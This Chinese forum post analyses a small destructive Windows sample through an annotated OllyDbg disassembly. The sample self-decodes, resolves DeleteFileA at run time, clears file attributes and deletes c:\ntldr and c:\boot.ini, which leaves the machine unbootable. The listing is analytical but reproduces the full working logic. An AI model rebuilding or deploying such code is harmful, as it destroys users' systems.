#1 垃圾病毒,足以致命
文章转自:win32k
; OllyDbg dump of a small destructive sample. The region 00406005-004060D7 is shown
; already decoded: the strings are readable and the slot at 00406066 holds the
; resolved DeleteFileA address, while the slot at 004060C1 is still zero, so this
; snapshot was taken after the decoder stub and the first GetProcAddress ran but
; before 00406081.
; Entry point: jump over the (originally encoded) payload to the decoder at 004060DF.
00406000 >/$ /E9 DA000000 jmp 004060DF
; --- Decoded payload, entered from 0040610C with "kernel32.dll" already pushed ---
; APIs are resolved at run time via LoadLibraryA/GetProcAddress; only those two and
; ExitProcess are referenced through the import table, so a static import scan does
; not show the file-deletion calls.
00406005 |> |FF15 50704000 /call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
; "00406***3" is a forum-mangled 00406033 (encoding 68 33604000); the
; "DeleteFileA" string is at 00406033 below.
0040600B |. |68 33604000 |push 00406***3 ; /ProcNameOrOrdinal = "DeleteFileA"
00406010 |. |50 |push eax ; |hModule
00406011 |. |FF15 54704000 |call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
; Cache the DeleteFileA pointer in the dd slot at 00406066 (inside the data area).
00406017 |. |A3 66604000 |mov dword ptr [406066], eax
0040601C |. |EB 4C |jmp short 0040606A
; Exit path, reached from 004060BC once both files have been deleted.
0040601E |> |6A 00 |push 0 ; /ExitCode = 0
00406020 |. |FF15 5C704000 |call dword ptr [<&KERNEL32.ExitProces>; \ExitProcess
; Data: DLL name, API name and the two boot files this sample targets.
00406026 |. |6B 65 72 6E 6>|ascii "kernel32.dll",0
00406033 |. |44 65 6C 65 7>|ascii "DeleteFileA",0
0040603F |. |63 3A 5C 62 6>|ascii "c:\boot.ini",0
0040604B |. |63 3A 5C 6E 7>|ascii "c:\ntldr",0
; 00406054: bytes 68 26 60 40 00 EB A7, i.e. a "push 00406026 / jmp short"
; sequence that OllyDbg rendered as ASCII/db. Nothing visible jumps here, so it
; looks like dead leftover code (unverified).
00406054 |. |68 26 60 40 0>|ascii "h&`@",0
00406059 | |EB |db EB
0040605A | |A7 |db A7
0040605B | |00 |db 00
0040605C | |00 |db 00
0040605D | |00 |db 00
0040605E | |00 |db 00
0040605F | |00 |db 00
00406060 | |00 |db 00
00406061 | |00 |db 00
00406062 | |00 |db 00
00406063 | |00 |db 00
00406064 | |00 |db 00
00406065 | |00 |db 00
; Pointer slot written at 00406017; already populated in this snapshot.
00406066 |. |AB1E837C |dd kernel32.DeleteFileA
; Resolve SetFileAttributesA the same way and cache it at 004060C1.
0040606A |> |68 26604000 |push 00406026 ; /FileName = "kernel32.dll"
0040606F |. |FF15 50704000 |call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00406075 |. |68 C5604000 |push 004060C5 ; /ProcNameOrOrdinal = "SetFileAttributesA"
0040607A |. |50 |push eax ; |hModule
0040607B |. |FF15 54704000 |call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00406081 |. |A3 C1604000 |mov dword ptr [4060C1], eax
; SetFileAttributesA("c:\boot.ini", 0x80 = FILE_ATTRIBUTE_NORMAL): presumably to
; clear the read-only/hidden/system attributes so the DeleteFileA that follows
; is not refused. Attribute-based protection alone therefore does not stop this.
00406086 |. |68 80000000 |push 80
0040608B |. |68 3F604000 |push 0040603F ; ASCII "c:\boot.ini"
00406090 |. |FF15 C1604000 |call dword ptr [4060C1]
; Delete boot.ini through the cached pointer rather than a direct import.
00406096 |. |68 3F604000 |push 0040603F ; /FileName = "c:\boot.ini"
0040609B |. |FF15 66604000 |call dword ptr [406066] ; \DeleteFileA
; Same sequence for ntldr (the NT 5.x boot loader); this is the fatal deletion.
004060A1 |. |68 80000000 |push 80
004060A6 |. |68 4B604000 |push 0040604B ; ASCII "c:\ntldr"
004060AB |. |FF15 C1604000 |call dword ptr [4060C1]
004060B1 |. |68 4B604000 |push 0040604B ; /FileName = "c:\ntldr"
004060B6 |. |FF15 66604000 |call dword ptr [406066] ; \DeleteFileA
; Done: back to ExitProcess at 0040601E.
004060BC |.^|E9 5DFFFFFF |jmp 0040601E
; Slot for the SetFileAttributesA pointer; still zero in this dump, so the
; snapshot predates 00406081.
004060C1 |. |00000000 |dd 00000000
004060C5 |. |53 65 74 46 6>|ascii "SetFileAttribute"
004060D5 |. |73 41 00 |ascii "sA",0
; Bytes past the decoded range (the decoder stops at 004060D8). 004060DE is
; overwritten by the stray store at 004060F1.
004060D8 | |00 |db 00
004060D9 | |60 |db 60 ; CHAR '`'
004060DA | |B8 |db B8
004060DB | |05 |db 05
004060DC | |60 |db 60 ; CHAR '`'
004060DD | |40 |db 40 ; CHAR '@'
004060DE |. |D7 |db D7
; --- Decoder stub (runs first, from the jmp at 00406000) ---
; Walks eax over [00406005, 004060D8) and subtracts 1 from every byte; a 0 byte
; is handled by the explicit branch and becomes 0xFF, the same result as dec.
; The code rewrites itself in place, so this section must be both writable and
; executable at run time.
004060DF |> \B8 05604000 mov eax, 00406005
004060E4 |> 8038 00 |/cmp byte ptr [eax], 0
004060E7 |. 75 05 ||jnz short 004060EE
004060E9 |. C600 FF ||mov byte ptr [eax], 0FF
004060EC |. EB 11 ||jmp short 004060FF
004060EE |> 56 ||push esi
004060EF |. 8BF0 ||mov esi, eax
; Stray store of the pointer's low byte into 004060DE. That byte lies outside
; the decoded range and is not read by any visible code, so this looks like
; junk/obfuscation rather than part of the decoding (unverified).
004060F1 |. A2 DE604000 ||mov byte ptr [4060DE], al
004060F6 |. 8A06 ||mov al, byte ptr [esi]
004060F8 |. FEC8 ||dec al
004060FA |. 8806 ||mov byte ptr [esi], al
004060FC |. 8BC6 ||mov eax, esi
004060FE |. 5E ||pop esi
004060FF |> 40 ||inc eax
; Exclusive end bound: the last byte decoded is 004060D7.
00406100 |. 3D D8604000 ||cmp eax, 004060D8
00406105 |.^ 75 DD |\jnz short 004060E4
; Pre-push the LoadLibraryA argument for the decoded entry at 00406005, which
; starts with the call itself, then transfer control into the decoded code.
00406107 |. 68 26604000 |push 00406026 ; ASCII "kernel32.dll"
0040610C \.^ E9 F4FEFFFF \jmp 00406005
微点拦截

其实 boot.ini 文件根本不用理：ntldr 内部集成了一份默认的启动配置，外部的 boot.ini 只不过是用于多系统选择；但删了 ntldr，系统就起不来了。另外注意，样本在删除前先用 SetFileAttributesA 把这两个文件的只读/隐藏/系统属性清掉，所以仅靠文件属性保护挡不住它。